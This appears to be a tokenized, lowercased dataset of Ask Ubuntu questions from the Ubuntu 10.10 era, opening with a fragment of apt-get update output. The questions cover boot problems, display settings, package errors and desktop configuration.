//extras.ubuntu.com/ubuntu/ maverick/main translation-en_gb hit http : //extras.ubuntu.com maverick release hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/nikount/orta-desktop/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/nikount/orta-desktop/ubuntu/ maverick/main translation-en_gb hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/stk/dev/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/stk/dev/ubuntu/ maverick/main translation-en_gb hit http : //ppa.launchpad.net maverick release.gpg ign http : //ppa.launchpad.net/tiheum/equinox/ubuntu/ maverick/main translation-en ign http : //ppa.launchpad.net/tiheum/equinox/ubuntu/ maverick/main translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/main translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/multiverse translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/restricted translation-en_gb hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //ppa.launchpad.net maverick release hit http : //extras.ubuntu.com maverick/main sources ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-updates/universe translation-en_gb hit http : //archive.ubuntu.com maverick-security release.gpg ign http : //archive.ubuntu.com/ubuntu/ maverick-security/main translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/main translation-en_gb hit http : //ppa.launchpad.net maverick release hit http : //extras.ubuntu.com maverick/main i386 packages ign http : //archive.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/multiverse translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick-security/restricted translation-en ign http : //archive.ubuntu.com/ubuntu/ maverick-security/restricted translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick-security/universe translation-en hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages ign http : //dl.google.com/linux/chrome/deb/ stable/main translation-en_gb ign http : //archive.ubuntu.com/ubuntu/ maverick-security/universe translation-en_gb hit http : //archive.ubuntu.com maverick release hit http : //archive.ubuntu.com maverick-updates release hit http : //archive.ubuntu.com maverick-security release hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages get:2 http : //dl.google.com stable release.gpg [ 197b ] hit http : //archive.ubuntu.com maverick/main sources hit http : //ppa.launchpad.net maverick/main sources hit http : //ppa.launchpad.net maverick/main i386 packages hit http : //archive.ubuntu.com maverick/restricted sources hit http : //archive.ubuntu.com maverick/universe sources hit http : //archive.ubuntu.com maverick/multiverse sources hit http : //archive.ubuntu.com maverick/main i386 packages hit http : //archive.ubuntu.com maverick/restricted i386 packages hit http : //archive.ubuntu.com maverick/universe i386 packages hit http : //archive.ubuntu.com maverick/multiverse i386 packages hit http : //archive.ubuntu.com maverick-updates/main sources ign http : //dl.google.com/linux/talkplugin/deb/ stable/main translation-en hit http : //archive.ubuntu.com maverick-updates/restricted sources hit http : //archive.ubuntu.com maverick-updates/universe sources hit http : //archive.ubuntu.com maverick-updates/multiverse sources hit http : //archive.ubuntu.com maverick-updates/main i386 packages hit http : //archive.ubuntu.com maverick-updates/restricted i386 packages hit http : //archive.ubuntu.com maverick-updates/universe i386 packages hit http : //archive.ubuntu.com maverick-updates/multiverse i386 packages ign http : //dl.google.com/linux/talkplugin/deb/ stable/main translation-en_gb get:3 http : //dl.google.com stable release [ 1,347b ] hit http : //archive.ubuntu.com maverick-security/main sources hit http : //archive.ubuntu.com maverick-security/restricted sources hit http : //archive.ubuntu.com maverick-security/universe sources hit http : //archive.ubuntu.com maverick-security/multiverse sources hit http : //archive.ubuntu.com maverick-security/main i386 packages hit http : //archive.ubuntu.com maverick-security/restricted i386 packages hit http : //archive.ubuntu.com maverick-security/universe i386 packages get:4 http : //dl.google.com stable release [ 1,347b ] hit http : //archive.ubuntu.com maverick-security/multiverse i386 packages get:5 http : //dl.google.com stable/main i386 packages [ 1,076b ] get:6 http : //dl.google.com stable/main i386 packages [ 735b ] fetched 4,899b in 4s ( 1,060b/s ) reading package lists ...
17911	ls on grub rescue - unknown filesystem	my ubuntu 10.10 system suddenly froze/crashed for no reason and i had to hard reboot my computer . surprisingly it does n't load anymore and stay stuck on a grub rescue prompt after an `` unknown filesystem '' message . that was enough clues to start googling for solutions . a simple grub rescue > ls show me all partitions on hard drives : ( hd0 ) ( hd0,5 ) ( hd0,1 ) ( hd1 ) ( hd1,1 ) ( hd1,2 ) ( fd0 ) according to all answers that i 've already found , next logical step is to ls again the specific partition that contains the kernel , which is ( hd0,1 ) in my case : grub rescue > ls ( hd0,1 ) unknown filesystem so here 's the problem : i can do a normal ls , but not ls a partition ( i tried all of them , just to be sure ) other ( unrelated ? ) issue , i ca n't repair anything since all linux live cd i try stay stuck in an infinite loading splash screen . the one with small dots below ubuntu logo .
17912	how to enable 1280x800 resolution in tty ?	i 've got toshiba u500 ( nvidia ) . tried changing /etc/default/grub in many ways , now i 've got : grub_default=5 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' vga=0x014c '' grub_cmdline_linux= '' vga=0x014c '' grub_gfxpayload_linux=1280x800x16 0x014c is what vbeinfo in grub related to 1280x800x16 i just wish my laptop could boot with nice , high resolution font and let tty consoles stay that way ... how is that possible ? regards , gocio
17917	how do i reset nautilus to the default configuration ?	i 've reinstalled nautilus from the maverick repositories after removing nautilus-elementary and the breadcrumb hacks , but i have no longer access to the `` preferences '' menu and the default toolbar . how do i reset nautilus to the default configuration ? update : i 've tried moving both ~/.nautilus and ~/.gconf/apps/nautilus folders as suggested below , but my `` edit '' menu is still missing the `` preferences '' item . running the nautilus-file-management-properties applet from the command line i 'm still seeing the `` tweaks '' tab that nautilus-elementary added . solved : my problems where caused by the wrong nautilus-data package being installed . i should have replaced the nautilus-data package along with the nautilus one when removing nautilus-elementary . before that i should have known there was a nautilus-data package ; - )
17918	how can i install a real time kernel ?	is there a repository i can use to install linux-rt for ubuntu 10.10 ? this package used to be available from the default repositories but is n't in the 10.10 repositories .
17919	when computer wakes up from sleep , screen is messed up	when i put the the ubuntu laptop to sleep ( meaning i close the screen shut . it seems to work if i go to system shutdown - > sleep but still testing it ) ( i am using ubuntu 10.04 and it is on an presario x1000 ) , when it wakes up , the screen has all these white and black noise signals across it and i have to restart . how do i fix this ?
17922	how can i rip an audio cd to an iso image ?	it seems i have found directions for using brasero to rip a cd to .iso file , but according to that , brasero is three ( 3 ) kinds of broken . recording image as cdrdao does not work , even after reinstalling both brasero and cdrdao . brasero closes ( crashes ? ) with assertion error . same with trying to rip to a .cue file . there is no option for ripping to a .iso file . what gives ? i mean , what should i do ? i really want .cue and .iso files , but i do n't know what to think about cdrdao . thanks . update : this is an audio cd . do those make good .iso files ?
17931	mounting ntfs external drive with bit locker	i am a complete novice to ubuntu/linux . how do i mount an usb powered external ntfs drive ? i 've installed both mount manager and ntfs configuration tool . this drive is encrypted having used windows bit locker . i know the password .
17932	is there a way of organize file in trash by delete-date ?	in trash i can organize files by last modified date , and others , but i want to see last deleted files . is there a way ? my `` visible columns '' options : my trash folder screenshot :
17933	how to remove/change saved svn passwords ?	i 'm using svn from eclipse and it has a feature that allows you to save the svn user and password . it think it uses something called gnome-keyring to do so . the problem is that now i need to use another user to access the svn repository , but i 'm unable to change the previous set user . how can i change/remove that previous user ?
17937	how can i run unity in a virtual machine ?	originally it was the case that unity could not run in tools like virtualbox . how can i now do so ?
17942	watching a dvd ?	i tried to watch a dvd on ubuntu 10.10 but with no success . i went to medibuntu to check that i have all the required repositaries . everything was up to date . so what 's wrong ?
17944	what is the minimum requirement to compile kernel modules	i want to compile a kernel module . what is the minimal set of packages that i need to download to succeed ? cheers , stefan
17950	grub rescue problems	here is my problem : after deleting the partition containing `` linux-mint 10 '' and restarting my laptop , i enter the grub rescue screen . after looking around , none of the resolutions fit my problem . for starters , i can not load any cd regardless of boot order in the bios and all partitions come up as unknown file systems . i do n't know if it 's relevant , but my partitions come up as hd0 , msdos3 , msdos2 , msdos1 . again , booting is not an option and all partitions come up as unknown filesystems .
17952	what are the differences between desktop , server , and alternate installs ?	i am trying to figure out what the exact difference is between the 3 different install disks . like what packages are different and such . for example : - the server disk does n't install gnome by default and has the non-pretty install wizard . - the alternate install gives options for encryption . are there any other differences ?
17953	synaptic and software centre segmentation fault	synaptic windows disappear after a few seconds when opened . this happens also for the software center . on running from the terminal it gives me this phrase `` segmentation fault '' how can i fix that ?
17954	converting from kubuntu to ubuntu in old install : fixing the desktop	i 've been using kubuntu since 9.04 but i 've decided to switch to ubuntu ( read : gnome ) now . i 've installed ubuntu-desktop a while ago , i think the system was in 9.10 then . i 'm now at 10.10 , all via upgrades ( never a reinstall ) . presumably because of this , i 'm missing a few things in my gnome when compared to a clean install of ubuntu 10.10 : notifications ( msn contact online , battery low , etc . ) look out of style . they look like text clouds instead of shiny ambiance boxes . this is how they look : i 'm missing my name and shutdown options in the top right of the panel how can i restore these ?
17960	how do i install both firefox beta and minefield on the same machine ?	first of all , i am aware of this question concerning installing firefox beta/nightly . i am wondering if there is a simple way to install both minefield ( currently pre9 ) and beta ( currently b7 . i assume b8 is forthcomming ) . both packages provide firefox-4.0 . is this a case where i will have to manually install ( and update ) one of these myself ?
17961	how do i open a terminal in the current location ?	i 've recently switched from kubuntu to ubuntu and while i like the speed and cleanlyness , i 'm missing some power features , particularly in nautilus , like : opening a terminal in the current location are there extension for nautilus to add these kinds of features ? or maybe a different file manager altogether . i know i can still use dolphin but that does n't integrate very well .
17967	can i use ping to see real time drop rates ?	i 'm pinging a server which is dropping packets . at the end of my ping i see something like : 100 packets transmitted , 85 received , 15 % packet loss , time 100030ms what i 'd like to do is run my ping continuously but be able to tell when packets are being dropped . my first thought is to watch the icmp_seq number and look for missing numbers . i 'd like to automate this process via a pipe . something along the lines of : ping server.wherever.com | cut -- someoptionshere | some other program that would display output only when packets were dropped ( as opposed to when the were received as ping does ) . is there any such sequence of pipes i could do to create this ?
17969	how do i type a path or url directly into nautilus ?	how can i type a in a path or url ( ftp , sftp , etc . ) directly into nautilus instead of having to browse around ?
17973	where can i find gwibber problems to fix ?	i would like to know what issues gwibber users are facing . for example problems as of dec 16 with the new twitter change over . looking for possible bugs and dev . issues .
17978	how do i change the font size in conky ?	i was wondering how to change the size of all the fonts to a bigger size . also under cpu usage i have 2 numbers one is white like u want it and the other is green and i ca n't figure out how to change just that one to white . i have pasted my conkyrc if that helps . i am sure its easy but for some reason i just cant seem to get it . and always tyavmia : - ) background yes font liberation : size=9 xftfont sans seriff : size=9 use_xft yes xftalpha 0.1 update_interval 4.0 total_run_times 0 own_window yes own_window_type override own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager double_buffer yes draw_shades no draw_outline no draw_borders no draw_graph_borders no minimum_size 620 maximum_width 420 default_color ffff00 default_shade_color 000000 default_outline_color 000000 alignment top_right gap_x 6 gap_y 22 no_buffers yes cpu_avg_samples 2 override_utf8_locale no uppercase no # set to yes if you want all text to be in uppercase use_spacer no text $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 } system : $ { hr 1 } $ { color white } o/s : $ { color # ffff00 } $ { alignr } ubuntu 10.10 $ { color white } o/s architecture : $ { color # ffff00 } $ { alignr } 64 bit $ { color white } hostname : $ { color # ffff00 } $ alignr $ nodename $ { color white } kernel : $ { color # ffff00 } $ alignr $ kernel $ { color white } uptime : $ { color # ffff00 } $ alignr $ uptime $ { color white } processes : $ { color # ffff00 } $ { alignr } $ processes ( $ running_processes running ) $ { color white } load : $ { color # ffff00 } $ { alignr } $ loadavg $ { color white } $ { font liberation : style=bold : pixelsize=12 } cpu : $ { hr 1 } $ { color white } pentium ( r ) dual-core cpu e5200 @ 2.50ghz $ { color white } cpu usage : $ { color white } $ { alignr } $ { freq } mhz x 2 $ { color white } $ { cpu cpu1 } % $ { color # 00ff00 } $ { alignr } $ { cpubar cpu1 3,170 } $ { cpu cpu2 } % $ { color # 00ff00 } $ { alignr } $ { cpubar cpu2 3,170 } $ { color white } $ { font liberation : style=bold : pixelsize=12 } $ { hr 1 } $ { color # cccccc } $ { color white } cores : $ { color white } $ { cpu cpu1 } % $ { color # 00ff00 } $ { alignr } $ { cpubar cpu1 3,170 } $ { color white } $ { cpu cpu2 } % $ { color # 00ff00 } $ { alignr } $ { cpubar cpu2 3,170 } $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 $ { color white } $ { cpu cpu1 } % $ { color # 00ff00 } $ { alignr } $ { cpubar cpu1 3,170 } $ { color white } $ { cpu cpu2 } % $ { color # 00ff00 } $ { alignr } $ { cpubar cpu2 3,170 } $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 } ram : $ { hr 1 } $ { color # ffff00 } $ { alignr } $ mem / $ memmax ( $ memperc % ) $ { color # ffff00 } $ { color # 00ff00 } $ { membar 3 } $ { color white } swap : $ { color # ffff00 } $ { alignr } $ swap/ $ swapmax $ { color # 00ff00 } $ { swapbar 3 } $ { color white } $ { font liberation : style=bold : pixelsize=12 } $ { font pixelsize=20 } $ { alignc } time : $ { time % i : % m : % s % p } $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 } highest cpu $ alignr cpu % mem % $ { hr 1 } $ { color white } $ { top name 1 } $ { color # ffff00 } $ alignr $ { top cpu 1 } $ { top mem 1 } $ { color white } $ { top name 2 } $ { color # ffff00 } $ alignr $ { top cpu 2 } $ { top mem 2 } $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 } $ { hr 1 } highest mem $ alignr cpu % mem % $ { hr 1 } $ { color white } $ { top_mem name 1 } $ { color white } $ alignr $ { top_mem cpu 1 } $ { top_mem mem 1 } $ { color white } $ { top_mem name 2 } $ alignr $ { color white } $ { top_mem cpu 2 } $ { top_mem mem 2 } $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 } disk i/o : $ { diskio } $ { color # 00ff00 } $ { diskiograph /dev/sda 3,170 } $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 } filesystem $ { hr 1 } $ { color white } root : $ { color # ffff00 } $ { alignr } $ { fs_free / } / $ { fs_size / } $ { color # 00ff00 } $ { fs_bar 3 / } $ { color white } new volume : $ { color # ffff00 } $ { alignr } $ { fs_free /media/new volume } / $ { fs_size /media/new volume } $ { color # 00ff00 } $ { fs_bar 3 /media/new volume } $ { color # ffffff } $ { font liberation : style=bold : pixelsize=12 } network : $ { hr 1 } $ { color white } ip : $ { color # ffff00 } $ { addr eth0 } /
17981	how can i prevent desktop users from connecting to new wireless networks ?	i have a created a wireless connection from the main admin account and checked the box saying `` available to all users '' , everything is working correctly . i only need to prevent the desktop users from switching the connection to another one . how can i accomplish this ? thanks .
17985	how can i prevent desktop users from accessing any online website ?	how can i prevent desktop users from accessing any online website ? i tried 127.0.0.1 * in /etc/hosts but it did n't do the trick . please note that i need to keep http : //localhost fully functional . thanks .
17986	chromium stopped working	when i open chromium the tabs do not load ( even the new tabs ) . first , i tried to remove ( actually , rename ) ~/.config/chromium to chromium_old and nothing got better . then i purged and removed all chromium-browser vestige in my laptop . i reinstalled chromium and tabs are still not working ( included bookmarks , about : , etc . ) i can surf the web without any problem in opera midori and firefox . i am using 10.0.614.0 ( 69504 ) ubuntu 10.10 , the problem started yesterday by the night ( utc ) when i updated as everyday my chromium-browser packages . since the problem started i 'd updated only once my browser .
17990	how can i share this local site to not use a sub directory ?	i 'm working on a site locally that 's just sitting in a folder : localhost/tempplace how can i route , with apache2 , that to be like : tempplace:8890 or just something so it 's not a sub directory ? it 's making local development very frustrating .
17993	strange sound of hard disk	i have one problem . i have laptop and the hard disk light lightning every 2 second strong in the meantime there are a lot of fast blinking even though i do n't do anything . even more - hard disk is doing some strange annoying sounds . i have asus k50ij , 320 gb hdd , 2gb ram and ubuntu 10.04 . any ideas thx
17995	are 20gb packs available without owning a suitable mobile ?	i do n't have a suitable phone , but i 'd like to sync more than 2gb . can i somehow buy a 20gb pack ?
17997	hdd transfer speed reduced when transfering lots and lots of files	when i drag 'n drop/copy , lots of big and small files the transfer speed gets reduced , compared to the speed i get when transfering the files one by one , its that a regular issue with mechanical hdds ? , could the use of an ssd improve the performance ?
17999	video does n't show up when using dual monitor on acer netbook	so whenever i plug my monitor into my acer netbook for dual monitor functionality , i can not watch videos on vlc ( window is black ) or use the webcam on skype . does anyone have a work-around for this ? or maybe this is a bug that needs to be submitted ? thanks .
18011	when will ubuntu one be available in german and other languages ?	ubuntu one is a very good service . but at the moment nearly everything is in only available in english and not in other languages like german , french etc.. also the terms of use are only english . lots of people do not use ubuntu one because they can not understand the terms of use completely .
18013	configuring evolution sync for samsung monte	i am trying to configure samsung monte with evolution for contacts and calendar using synce and/or opensync but somehow unable to do . used some standard help pages on the web , but none seem to work . has any one done it . i have a maverick - 64 bit . best
18014	how to move windows inside ubuntu without reinstalling ?	i have installing windows 1st , then ubuntu , at long time ago , now im wondering do we can make windows that had being installed at last , that connected to the ubuntu , / dual boot , that may allowing me to acess windows inside of ubuntu , i try to goggling , the result is ask me to reinstalling , the problem is i had lost the dvd installer for windows . any idea how to make the old windows connected with new ubuntu without reinstalling , ?
18015	how do i get a sb x-fi xtreme audio ca0110 working ?	alsa does not support my ( sb x-fi xtreme audio ca0110 ) audio card as shown in their web page . now my question is how can i configure my audio driver without using alsa ? and should i waste my time trying to make this audio card work or it is simply impossible for linux ?
18021	how to persistently export an environment variable before starting compiz	a few months ago compiz suddenly stopped working . that is , it got to a refreshrate where the redrawing is more than noticeable . it took 5 seconds to redraw a chat window . ever since i 've been using metacity instead , but i 've found myself missing some plugins badly . i found the following solution : export __gl_yield= '' nothing '' ; compiz -- replace this works fine , everything is fast again with compiz . but how to make sure this variable is always set whenever i run compiz ? i 'm using standard nvidia drivers , failed to get the open source ones working .
18022	how to disable an `` always there '' program if it is n't in the processes list ?	i have crashplan and it is constantly running in the background and making backups every 15 minutes . it caused some problems with the backup target folders , so i want it to be inactive while i am making changes to these folders . i started the application itself , but could not find some kind of `` pause '' button . so i decided to just stop its process . i first tried the lazy way - the system monitor in the gnome panel has a `` processes '' tab - but did n't find it listed there . then i did a sudo ps -a and read through the whole list . i do n't recognize everything on the list ( many process names are self-explaining , like evolution-alarm , but i do n't recognize others like phy0 ) but there was nothing which sounded even remotely like crashplan . but i know that there must have been a process belonging to crashplan running at this time , because the main crashplan window was open when i ran the command . do you have any advice how to stop this thing from running ? the best solution would involve temporary preventing it from loading on boot too , since i may need to reboot while doing the maintenance there .
18023	how do i upgrade mysql to 5.5 , am i best off waiting for it to be available through apt-get ?	how would i go about upgrading mysql to version 5.5 on ubuntu server 9.10 ? would i be better off waiting for it to be an easy $ sudo apt-get install mysql-server job ? i 'm also unsure as to which download i would need to get from here .
18025	no kernel modesetting detected , can only boot xorg in fail safe graphics mode with intel video card ?	i have installed ubuntu 10.10 and while i can launch it in fail safe graphics mode , i only get a text console when i try to launch it normally . apparently there is a problem with my drivers or something related . i updated all packages etc . in fail safe graphics mode , this did not help . this is a copy of /var/log/xorg.0.log : http : //tom.pastebin.com/aqgxa9ej as you can see , it says : [ 69.197 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 69.206 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 69.206 ] compiled for 1.9.0 , module version = 0.0.2 [ 69.206 ] abi class : x.org video driver , version 8.0 [ 69.206 ] ( ee ) open /dev/fb0 : no such file or directory [ 119.528 ] ( ee ) intel ( 0 ) : no kernel modesetting driver detected . [ 119.528 ] ( ii ) unloadmodule : `` intel '' [ 119.528 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 119.528 ] fatal server error : [ 119.528 ] no screens found i tried adding video=s-video : d and nomodeset to grub launch command , these had no effect ( found these suggestions on the web ) . if i execute startx after logging in in this console , my screen becomes blank ( well.. black ) until i press the shutdown button of my laptop . some info : lsmod |grep '^i ' returns : i915 , i2c_algo_bit , intel_ips , intel_agp dmesg | grep drm returns : 6.745490 drm initialized drm 1.1.0 20060810 lspci |grep vga returns : intel corporation core processor integrated graphics controller ( rev 02 ) glxinfo | grep vendor returns : server glx vendor string : sgi client glx vendor string : mesaproject and sgi opengl vendor string : mesa project intel_reg_dumper > regdump_broke.txt returned : http : //tom.pastebin.com/fjeirxjq dmesg returns : http : //tom.pastebin.com/ztftpju7 is there anything i can do to solve this issue ? i have tried to use the xorg-edgers ppa with the following commands to upgrade my intel drivers : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get upgrade however this did not resolve the issue . some information about my laptop , which i bought yesterday : name : toshiba satellite l670 1dt processor : intel pentium p6100 dualcore 2.0ghz video card : build in , intel hd graphics dynamic video memory technology 5.0 i was told that this is a new arrandale processor , with chipset hm55 ( very recent apparently ) . thanks .
18032	how to disable auto play mp3 files ?	when i put my mouse/cursor over an mp3 file , a few seconds later the music/file starts playing . is there any way to disable this ?
18036	ca n't connect to internet with noapic option	yesterday ubuntu 10.04 just hanged and when i restarted it , i just got a black screen with a blinking cursor , googling it i found a solution which is passing noapic flag during boot .. that worked well but now i ca n't connect to the internet . so i need one of the following : boot without noapic thus having my connection back enabling net connection with the noapic flag thanks in advance ...
18037	how can i switch between windows of the same application ?	i often have more than ten windows open at the same time and some of them are of the same applications , notably gnome-terminal . often when i am currently on one terminal , i just want to get to another terminal . with alt-tab you have to choose from windows of all the applications , which is a pain . even with gnome3 which groups windows by applications and gives preview of windows with alt-` it is n't enough because it 's hard to distinguish terminal windows from previews . you can only tell which terminal does what when the full view is shown in most cases . so is there an application/windowing system/gnome shortcut that shows you only other windows of the same application when you are switching ?
18038	how to limit internet speed ?	i have 3 accounts in my pc , i would like as the admin of the pc to limit the internet speed ( upload/download ) for the other 2 accounts , is there a way to do this ?
18045	copy and paste does not work well	i upgraded from 10.04 to 10.10 and having been trying to fix this issue for a couple of weeks with no luck . copy and pasting text is really wonky . sometimes it works sometimes no matter what i do and copy will paste instead . i use different programs , thunderbird , firefox and gedit . sometimes it is fine others i can click all different ways with no luck at all things i have tried : installing various clipboard programs . ( seems to be making the issue worse ) i tried using the esc key also what does not work : ctrl + c , ctrl + v , mouse right click nor edit > copy and paste . i have a microsoft wireless 1000 keyboard/mouse and dual monitors . just as a test i put the live cd of 10.04 and could not get the problem to duplicate . nvidia graphics card ... am i so messed up may have to wipe and reinstall 10.04 ?
18047	how to open a remote python program from terminal by ssh ?	i type ssh -x name @ blah.edu and asks for a password , i type it in and get logged in . name @ blah.edu : ~ $ program.py then nothing happens , when it should actually pop up . why is this happening and how do i solve it ?
18052	.exe file permission fail	i 'm trying to run a exe file that is located on my vista partition , when i browse to the file and try to change the file to run as executable the tick box unticks itself right after i tick it , i tried running gksu nautilus but it does the same thing
18058	xrandr : ca n't add new mode	after enabling nvidia drivers in ubuntu 10.10 , ubuntu sets monitor refresh rate to 50 hz . when i try to change it to 60 hz , i get this error : cvt output cvt 1280 800 1280x800 59.81 hz ( cvt 1.02ma ) hsync : 49.70 khz ; pclk : 83.50 mhz modeline `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync xrandr error message xrandr -- newmode `` 1280x800_60.00 '' 83.50 1280 1352 1480 1680 800 803 809 831 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 154 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19
18060	i ca n't open program from remote computer , why ?	when i open a program from my local account using terminal , it works . for example , i type `` firefox '' ... firefox pops up . then when i ssh into my remote account , i type `` firefox '' nothing happens . what is the problem ? nwuser @ ubuntu : ~ $ ssh -x name @ blah.edu name @ blah.edu 's password : i get logged in cynthia @ fiber : ~ $ gedit nothing pops open after i hit enter
18065	external usb 2.0 drive formatted as ext4 periodically `` freezes '' if files are not read or written	i have an external usb 2.0 harddisk ( seagate 9sd2a2-500 ) that periodically `` freezes '' when files on the drive are not written to or read within approximately five minutes . the drive is formatted as ext4 , and i am running ubuntu 10.04 lts 64-bit . if i am editing a file that is stored on this drive , and i do not save the file every five minutes , an open application ( such as gedit ) will become unresponsive . i must wait for at least a minute before the external drive becomes responsive again and the file can be saved . i 've also noticed this behavior when trying to access a file in nautilus . it appears that the drive is `` falling asleep '' and then `` wakes up '' after a certain time . what is happening here , and is it possible to change this behavior ? i have another usb 2.0 harddisk attached to the computer . the harddisk is formatted as fat32 , and does not show this behavior .
18067	how to add ntfs partition to fstab ?	i need to run .exe files on my vista partition but i ca n't give them the right permissions so i need a way of auto mounting with the full permissions in order to run any files i need otherwise i have to manually mount it each time i need it .
18070	how do i change the name of a file once i have uploaded it to the ubuntu one cloud ?	i 've uploaded some camera files to my ubuntu one file repository and they have unreadable file names . is there any way to change the name once the file is in the repository ? i guess i could download them , change the names , and re-upload them . i was just looking for a way to rename them on the site instead ...
18078	what is the difference between a desktop environment and a window manager ?	as the title says . i 'm having a really hard time trying to understand what the differences between a desktop environment and a window manager are ? edit : this is what i found out later . there are basically three layers that can be included in the linux desktop : x windows – this is the foundation that allows for graphic elements to be drawn on the display . x windows builds the primitive framework that allows moving of windows , interactions with keyboard and mouse , and draws windows . this is required for any graphical desktop . window manager – the window manager is the piece of the puzzle that controls the placement and appearance of windows . window managers include : enlightenment , afterstep , fvwm , fluxbox , icewm , etc . requires x windows but not a desktop environment . desktop environment – this is where it begins to get a little fuzzy for some . a desktop environment includes a window manager but builds upon it . the desktop environment typically is a far more fully integrated system than a window manager . requires both x windows and a window manager . examples of desktop environments are gnome , kde , xfce among others )
18079	ubuntu one notifies me every ten minutes that my account is full but there is nothing in it	i have checked several times and there are no files , no music , etc . in my ubuntu one account . yet , every ten minutes i get a popup that tells me my account is full , and offering me the opportunity to buy more storage . why would i want more storage , when i do n't use what i have ? how can i turn off these reminders ?
18082	error in software sources 404 not found	i get an error while using aptitude update : err http : //ppa.launchpad.net maverick/main sources 404 not found err http : //ppa.launchpad.net maverick/main i386 packages 404 not found what do i do to fix this ?
18086	how can i sync my home folder `` both ways '' using rsync	i would like to sync my home folder using a server with ssh , is it possible to do it with rsync ? i need to be able to sync it between a few computers . thanks for your help
18091	ubuntu extras keyring error	recently i got lots of gpg errors and tried the following methods at various stages : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 3e5c1192 sudo apt-get install -reinstall ubuntu-extras-keyring ( for ubuntu extras only ) gpg –keyserver keyserver.ubuntu.com –recv 3e5c1192 gpg –export –armor 3e5c1192 | sudo apt-key add - sudo apt-get update sudo aptitude -o acquire : :http : :no-cache=true -o acquire : :brokenproxy=true update` sudo -i apt-get clean cd /var/lib/apt mv lists lists.old mkdir -p lists/partial apt-get clean apt-get update i again got badsig error for extras.ubuntu.com today . so , i 'm really at a loss what 's causing this error to occur time and again . i really want to solve this problem once and for all .
18092	i can not install or remove any packages because i keep getting this error : subprocess installed pre-removal script returned error exit status 127	i installed a cups wrapper for a printer , but it 's broken . now both the store and synaptic wo n't install or remove any packages because the `` mfc240ccupswrapper '' can not be repaired or changed . i 've tried to force remove it to no avail . this is the output of attempting to remove the package : removing mfc240ccupswrapper ... /var/lib/dpkg/info/mfc240ccupswrapper.prerm : 3 : /usr/local/brother/printer/mfc240c/cupswrapper/cupswrappermfc240c : not found dpkg : error processing mfc240ccupswrapper ( -- remove ) : subprocess installed pre-removal script returned error exit status 127 no apport report written because maxreports is reached already /var/lib/dpkg/info/mfc240ccupswrapper.postinst : 3 : /usr/local/brother/printer/mfc240c/cupswrapper/cupswrappermfc240c : not found chmod : can not access `/usr/local/brother/printer/mfc240c/cupswrapper ' : no such file or directory dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mfc240ccupswrapper
18096	where is the link for the ubuntu one for windows ?	i used to know where it was but ca n't find it , any help please ?
18097	can i export shotwell pictures database saving all the tags ?	i 've imported lots of pictures into shotwell and spent some time setting tags . are those tags locked-in in shotwell or i can export them ( and import again or use with other software ) ?
18101	after grub loads linux : no init found	when i start ubuntu from the grub , i get a strange message , and a medieval prompt as : no init found busybox v1.15.3 ( ubuntu 1.1.15 3-ubuntu5 ) built in shell ( ash ) enter 'help ' for a list of commands ( initramfs ) _ i use a dualboot system , with ubuntu meerkat , and windows 7 . is there any chance of recovery ? thanks . edit : the pc on a whim decide to boot itself up , and so i couldnt try the solution mentioned below . i will accept the answer anyway .
18103	how can i change the default location of content directories ( eg pictures , templates , music ) in my home folder ?	i have multiple users on my home desktop . i am content with most of the default user directories , however i would like to make one change . i would like to setup a common directory for music ( ie /home/common/music/ ) that is writable to all users and nautilus/dolphin/whatever recognizes as the user 's music directory . i know that it would involve changing the xdg user directory setup , but everything i see points that it is relative to the user 's $ home . is there a way i can specify an absolute path ?
18106	how do i install opsview ?	trying to install opsview onto lucid . however , i 'm not sure of the exact commands to run after altering the /etc/apt/sources.list file . what commands are necessary after that ?
